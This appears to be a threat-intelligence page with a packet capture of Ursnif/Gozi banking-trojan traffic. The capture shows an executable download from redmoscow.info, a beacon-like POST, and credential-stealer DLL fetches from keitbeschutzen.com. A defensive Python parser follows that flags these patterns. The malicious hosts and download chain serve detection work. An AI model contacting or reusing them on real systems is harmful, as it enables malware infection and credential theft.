
zzz.exe Delivers Ursnif Gozi Malware Banking Trojan PCAP File Download Traffic Sample GET /mozglue.dll

Latest indicators of compromise from our Ursnif IOC feed. Ursnif (aka Gozi, aka ISFB) is a banking trojan targeting users in the USA and Europe. It was designed for the primary purpose of perpetrating fraud.

Fast, accurate identification of commodity malware like Ursnif allows SOC teams to focus their efforts on hunting for more targeted and stealthy malware. By quickly blocking, de-prioritizing and filtering out the noise associated with mass-distributed malware and crimeware, our Threat Intelligence Feed allows you to focus on the threats that matter to your organization.

2019-10-03 06:01:00.812050 IP 192.168.86.25.53425 > 104.27.161.249.80: Flags [P.], seq 3229838630:3229839201, ack 2872661083, win 16450, length 571: HTTP: GET /tmp/zzz.exe HTTP/1.1
E..cS.@….&..V.h……P..m&.9T[P.@B1<..GET /tmp/zzz.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=120970-
Unless-Modified-Since: Thu, 03 Oct 2019 02:07:13 GMT
If-Range: "1e1000-593f80b3c67d3"
Host: redmoscow.info
Connection: Keep-Alive
Cookie: __cfduid=df482dfbd65d8b46f1c87aacc388aec4a1570096931

2019-10-03 06:01:04.855775 IP 104.27.161.249.80 > 192.168.86.25.53425: Flags [P.], seq 1848473:1849587, ack 571, win 30, length 1114: HTTP
E ..+.@.7…h…..V..P…U….oaP…g……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….
2019-10-03 06:01:19.120810 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 2196019561:2196020046, ack 311058881, win 16514, length 485: HTTP: POST /223 HTTP/1.1
E…U.@…….V.h.K….P…i..a.P.@…..POST /223 HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: keitbeschutzen.com
Connection: Keep-Alive
Cache-Control: no-cache

--1BEF0A57BE110FD467A--

2019-10-03 06:01:19.279627 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 1:314, ack 485, win 233, length 313: HTTP: HTTP/1.1 200 OK
E .a./@.1…h.K…V..P….a….NP…….HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2019 10:02:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

5c
……….3.1.C. ..F..:…z…..M..].o……….c..WRQbmj`]RT.j.._..Zl.[Z..l.[l..5…R…
0

2019-10-03 06:01:19.284253 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 485:842, ack 314, win 16435, length 357: HTTP: GET /freebl3.dll HTTP/1.1
E…U.@…. ..V.h.K….P…N..b.P.@3q7..GET /freebl3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive
2019-10-03 06:01:20.010931 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 264538:265974, ack 842, win 242, length 1436: HTTP
E ….@.1…h.K…V..P….k…..P….^………… ……………B…….NIST-P521………………………………m………………………………………………………………………………… …~…).a|m~M=.L.Hw,………. ….c.X………………………………………………. …~…).a|m~M=.L.Hw,………. ….0……………….0…P…p……………….B… …….Curve25519…………………………………………………………Z.5..:…..Uv…e….S..;.<>’.Kk....,BG....c.@.w.}.-.3...9E....O.B........J|...+.3Wk1^...@h7.Q..............................c%Q......k....,BG....c.@.w.}.-.3...9E....O.B........J|...+.3Wk1^...@h7.Q...............<...\...|...........................B... ........................................................................................................1/..>.....k..-....n..A.....P..Z.V9.....*.....*...."...7..... .tn.;b....Y.A..T*8U..].U)l:T^8rv .6..J.&,o]......)....(..|..1..... …~..zC.|……………………….cM..7-.X…H..z…j..)s…..”…7….. .tn.;b….Y.A..T8U..].U)l:T^8rv .6..J.&,o]……)….(..|..1….. ...~..zC.|..._..………………………@…p……………b…0……………………………………………………………………………………………………………………………………..Q.>.a……!…@…r[………. .V.9Q.~.{.R..;…5s..=,4..E..kP?………………>.f#..B.d.9.?.!.(.kM=..K^w..Y(...'....3H...jB..~~1...f....
2019-10-03 06:01:20.126700 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 330594:332030, ack 842, win 242, length 1436: HTTP
E ....@.1...h.K...V..P....m"....P...N'..d.G.t7.....BH........v................0...0...U.#..0...Z..{* ...q...-.eu.X0…U………I……C.N.W9G…0…U………..0…U.%..0 ..+…….0w..U…p0n05.3.1./http://crl3.digicert.com/sha2-assured-cs-g1.crl05.3.1./http://crl4.digicert.com/sha2-assured-cs-g1.crl0L..U. .E0C07. .H...l..0*0(..+.........https://www.digicert.com/CPS0...g.....0....+........x0v0$..+.....0...http://ocsp.digicert.com0N..+.....0..Bhttp://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0...U.......0.0.. *.H.............CK.L .1"5.v.....=a. n.D<h.[....V.DV.4...YR....5........4D................Rl..!.W....\. :t[U........$..V{.q..K3@.-(>...A.....l.T|p....zXf...-.&.R.1Ln...j$..l.,....j.q.....AUuV.k..'.P...f..m..T....[n.H{...c..*..TS.....fB.}l…&……q.’
L………x.Gf…N.0…0………….8…5n..j…P0.. *.H……..0^1.0 ..U….US1.0…U.
..Symantec Corporation100…U…’Symantec Time Stamping Services CA - G20…121018000000Z..201229235959Z0b1.0 ..U….US1.0…U.
..Symantec Corporation1402..U…+Symantec Time Stamping Services Signer - G40..”0.. *.H………….0..
……c.9D..#.DI…..a
S…..,.J.n….K..c…2[.^.Z..(P…..a;EQ…V..G….f=G.pr…
…..d…%….”….z.w.[e…t.A…L….-.wD.h..tw..[2.V.3..c.I.:…3……….W.;…z”.$…p..N.&…..O….(r……….W0..S0…U…….0.0…U.%…..0
..+…….0…U………..0s..+……..g0e0*..+…..0…http://ts
2019-10-03 06:01:20.126720 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 334902:334952, ack 842, win 242, length 50: HTTP
E .Z..@.1…h.K…V..P….}…..P…e%..#j:…..9]…..’…..XC…#.#..+..9.,..I^.>….h..
2019-10-03 06:01:20.127904 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 842:1199, ack 334952, win 65047, length 357: HTTP: GET /mozglue.dll HTTP/1.1
E…Ur@…….V.h.K….P……~(P….b..GET /mozglue.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive
2019-10-03 06:01:20.253950 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 471372:472470, ack 1199, win 250, length 1098: HTTP
E .r.z@.1…h.K…V..P……….P…t2……7…1.0…..http://www.mozilla.com0.. *.H…………<“…q7.F..u.1….’ep......e....5N.-,..E…8…jK!…….. .yx.…R..bX:..v5…{.lh…5.u….~..~C……(.uxv..R3?r..&…VA..=c..m..$..Q. ……..?.4..q.oU.]…}..W[;..:..-..$../V ..w..9.2.ZoT.NO….[T….1..0T……?+…..m,%.5;..].j..e3/..]..). ..(c....Ls..….D.X.?….W…C…)…..Z.t..l…+…..(……….S..A.~uJ....-…..|…%.^.|.^]k.0.-J..fX0+………..2.R..y……..k.$….u.l|rC.p…….”………….6….O..’W+Z….%…4……<.R………0…. *.H…. .1…0……0r0^1.0 ..U….US1.0…U. ..Symantec Corporation100…U…’Symantec Time Stamping Services CA - G2…..8…5n..j…P0 ..+…….]0.. *.H…. .1.. *.H……0.. *.H…. .1…181114000811Z0#. *.H…. .1….$..b………..3=(.0.. *.H………… l. ……o…@y…c..TBT……pJ..g”&.AI.|./xO.G…k….”…….K.EX.I….7…..u…n…w|.X.}..L..#G….,3…B..K&.~..Y..W…..r9..fH.c..r.=.U[6H….F..S|.dC[}.5j…..s.4.b. Bv..N^H..9..r.w.v.u:….)…0.!..qu..[..E.Z….`.. M.E<.CjL.56…e_..h.5….
2019-10-03 06:01:20.255368 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1199:1557, ack 472470, win 65338, length 358: HTTP: GET /msvcp140.dll HTTP/1.1
E…U.@…….V.h.K….P…….VP..:.O..GET /msvcp140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:20.626528 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 912210:912940, ack 1557, win 258, length 730: HTTP
E ….@.1…h.K…V..P….M….~P….R..0…U…
Washington1.0…U….Redmond1.0…U.
..Microsoft Corporation1&0$..U….Microsoft Time-Stamp PCA 2010..3….L….!|…….0.. .H.e.........20.. *.H.... .1...*.H.... ...0/. *.H.... .1". .a..T.Gv ...P.^......p.......=..0....*.H.... ...1..0..0..0....^/..q..2...^J;.N....0..0...~0|1.0 ..U....US1.0...U... Washington1.0...U....Redmond1.0...U. ..Microsoft Corporation1&0$..U....Microsoft Time-Stamp PCA 2010..3....L....!|.......0...........J.m0..:.5B..0.. *.H............VQ.l......Wl.$.......v..-&>r%..2..MB.+....mn..Iz...^.) . ...UT..xS#{..;u 2...]q..Y;u........_.gD.a@.&...... .*...F....U..W.-/..&y.X…E.p.K.u….Y..I3…Z….r…g…q…Ut..&…..XQ……r.JB#..1..E…..o…f…………=.%5..B.k..n..>…….D…5..w…3
2019-10-03 06:01:20.627701 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1557:1911, ack 912940, win 65338, length 354: HTTP: GET /nss3.dll HTTP/1.1
E…V#@…….V.h.K….P…~..O.P..:….GET /nss3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:21.378227 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2159388:2159452, ack 1911, win 267, length 64: HTTP
E .h..@.1…h.K…V..P….T…..P….{…….!FjJ.h5.Ej._……….6V.f..0….[?.D.@..#1…j………..
2019-10-03 06:01:21.379453 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1911:2269, ack 2159452, win 65322, length 358: HTTP: GET /softokn3.dll HTTP/1.1
E…Wt@…….V.h.K….P……U.P..….GET /softokn3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:21.529860 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2304488:2304650, ack 2269, win 275, length 162: HTTP
E …{@.1..Ih.K…V..P………FP…….i.-}d…Z…`…….w&.{.c.d.+l…x.vx..R..r….]…k.9…9..1…K…..U…f.dz..%R…….h.^.t.,..u.%MK>.e……>…6…..K..)Z.Qjn*.L.m9..-………..=p.0./…
2019-10-03 06:01:21.530760 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 2269:2631, ack 2304650, win 65338, length 362: HTTP: GET /vcruntime140.dll HTTP/1.1
E…W.@…….V.h.K….P…F…JP..:5;..GET /vcruntime140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:21.660746 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2387938:2388783, ack 2631, win 283, length 845: HTTP
E .u..@.1..ch.K…V..P……….P…’I..nV…B…….T.4&…X!^&…..
…..t.BY^…h.o..#r;:u.a..H..k……WcG=…….$…?.1…0……0..0|1.0 ..U….US1.0…U…
Washington1.0…U….Redmond1.0…U.
..Microsoft Corporation1&0$..U….Microsoft Time-Stamp PCA 2010..3….C:….R…….0.. .H.e.........20.. *.H.... .1...*.H.... ...0/. *.H.... .1". ..inH....'.......H..^.j..#:k..G)0....*.H.... ...1..0..0..0..........Nn..u...Q.. m:0..0...~0|1.0 ..U....US1.0...U... Washington1.0...U....Redmond1.0...U. ..Microsoft Corporation1&0$..U....Microsoft Time-Stamp PCA 2010..3....C:....R.......0.......fc.r..).........0.. *.H..............U.$"...... E...V...E.k.}.N…^….)..;…g%…..l..L..9.}.)..1..&.v……k.N:r….SVx;..xv…i.p…..p..2z..:..Qk_..v..l..b…K……j..}..Z..r.O}..-.{@…..$K….M.?h….%.t…..j.v…cK…….r.Yf.fZ”e.e.G…..x….k4.1..hfK.3……./(………..&bJ
2019-10-03 06:01:21.989504 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2387938:2388783, ack 2631, win 283, length 845: HTTP
E .u..@.1..bh.K…V..P……….P…’I..nV…B…….T.4&…X!^&…..
…..t.BY^…h.o..#r;:u.a..H..k……WcG=…….$…?.1…0……0..0|1.0 ..U….US1.0…U…
Washington1.0…U….Redmond1.0…U.
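The capture above is tcpdump -A text, which is awkward to triage by eye because the HTTP headers are interleaved with raw payload bytes. The script below is an added example (not code from this page or from the feed vendor) that parses that format and pulls out the client requests with their headers, then flags the three things this capture shows a defender: an executable fetched over plain HTTP and resumed with a Range header, a multipart POST whose 25-byte body is nothing but the closing boundary, and a run of Mozilla NSS / MSVC runtime DLLs (freebl3, mozglue, nss3, softokn3, msvcp140, vcruntime140) pulled from one host. The hostnames and paths in the constructed sample come from the capture on this page; the byte thresholds, the DLL list and the assumption that a stealer fetches these libraries to read the Firefox credential store are this example's own.

```python
"""Pull HTTP request indicators out of tcpdump -A text like the capture above.

Added example (not the page's or the feed vendor's code): parses each packet
summary line plus the ASCII header block after it, then flags the patterns this
capture shows. Thresholds and the DLL list are this example's own assumptions.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample: request lines from this page, binary payloads dropped,
# header blocks trimmed to what the rules below look at.
SAMPLE = """\
2019-10-03 06:01:00.812050 IP 192.168.86.25.53425 > 104.27.161.249.80: Flags [P.], seq 3229838630:3229839201, ack 2872661083, win 16450, length 571: HTTP: GET /tmp/zzz.exe HTTP/1.1
E..cS.@....GET /tmp/zzz.exe HTTP/1.1
Range: bytes=120970-
Host: redmoscow.info

2019-10-03 06:01:19.120810 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 2196019561:2196020046, ack 311058881, win 16514, length 485: HTTP: POST /223 HTTP/1.1
E...U.@....POST /223 HTTP/1.1
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: keitbeschutzen.com

--1BEF0A57BE110FD467A--

2019-10-03 06:01:19.279627 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 1:314, ack 485, win 233, length 313: HTTP: HTTP/1.1 200 OK
Server: nginx

2019-10-03 06:01:19.284253 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 485:842, ack 314, win 16435, length 357: HTTP: GET /freebl3.dll HTTP/1.1
E...U.@....GET /freebl3.dll HTTP/1.1
Host: keitbeschutzen.com
2019-10-03 06:01:20.127904 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 842:1199, ack 334952, win 65047, length 357: HTTP: GET /mozglue.dll HTTP/1.1
E...Ur@....GET /mozglue.dll HTTP/1.1
Host: keitbeschutzen.com
2019-10-03 06:01:20.627701 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1557:1911, ack 912940, win 65338, length 354: HTTP: GET /nss3.dll HTTP/1.1
E...V#@....GET /nss3.dll HTTP/1.1
Host: keitbeschutzen.com
"""

PACKET_RE = re.compile(r"^\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+ IP ")
# Only summary lines that tcpdump decoded as an HTTP *request* (method + path).
REQUEST_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \S+) IP (?P<src>[\d.]+)\.\d+ > (?P<dst>[\d.]+)\.\d+: "
    r".*length \d+: HTTP: (?P<method>[A-Z]+) (?P<path>/\S*) HTTP/1\.[01]$"
)
HEADER_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*):\s*(.*)$")
# NSS libraries behind the Firefox credential store plus the MSVC runtime they
# need; a stealer fetching these is a known pattern (assumption of this example).
STEALER_SUPPORT_DLLS = {"freebl3.dll", "mozglue.dll", "nss3.dll",
                        "softokn3.dll", "msvcp140.dll", "vcruntime140.dll"}


@dataclass
class HttpRequest:
    ts: str
    dst: str
    method: str
    path: str
    headers: dict = field(default_factory=dict)   # lower-cased header name -> value

    def header(self, name, default=""):
        return self.headers.get(name.lower(), default)

    def host(self):
        return self.header("host") or self.dst


def parse_requests(text):
    """Return the client HTTP requests in tcpdump -A output, each with its headers."""
    requests, current = [], None
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m:
            current = HttpRequest(m["ts"], m["dst"], m["method"], m["path"])
            requests.append(current)
            continue
        if PACKET_RE.match(line) or not line.strip():
            current = None          # another packet (e.g. a response) or end of headers
            continue
        h = HEADER_RE.match(line) if current else None   # skips the raw payload line
        if h:
            current.headers[h.group(1).lower()] = h.group(2).strip()
    return requests


def flag_requests(requests, tiny_post=64, min_dlls=3):
    """Map (host, path) -> reasons, for the request patterns seen in this capture."""
    findings, dlls_by_host = defaultdict(list), defaultdict(set)
    for r in requests:
        key, name = (r.host(), r.path), r.path.lower().rsplit("/", 1)[-1]
        if name.endswith(".exe"):        # executable over plaintext HTTP
            rng = r.header("range")
            findings[key].append("exe download" + (" resumed with Range: " + rng if rng else ""))
        if r.method == "POST" and "multipart/form-data" in r.header("content-type").lower():
            body = int(r.header("content-length", "0") or 0)
            if body < tiny_post:         # body is little more than the boundary itself
                findings[key].append("multipart POST with %d-byte body, beacon-like" % body)
        if name in STEALER_SUPPORT_DLLS:
            dlls_by_host[r.host()].add(name)
    for host, dlls in dlls_by_host.items():
        if len(dlls) >= min_dlls:
            findings[(host, "*")].append("%d NSS/MSVC DLLs from one host: %s" % (len(dlls), ", ".join(sorted(dlls))))
    return dict(findings)


def host_summary(requests):
    """Group observed requests by Host header, the shape needed for a block list."""
    by_host = defaultdict(list)
    for r in requests:
        by_host[r.host()].append("%s %s" % (r.method, r.path))
    return dict(by_host)
```

Run it against a full tcpdump -A capture (`tcpdump -A -r capture.pcap 'tcp port 80' > dump.txt`) and feed the file contents to `parse_requests`; `host_summary` gives you the host-to-path list for blocking, and `flag_requests` gives the reasons. The blank-line and packet-boundary resets in `parse_requests` matter: without them the `Server: nginx` headers of the response would be folded into the preceding POST.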
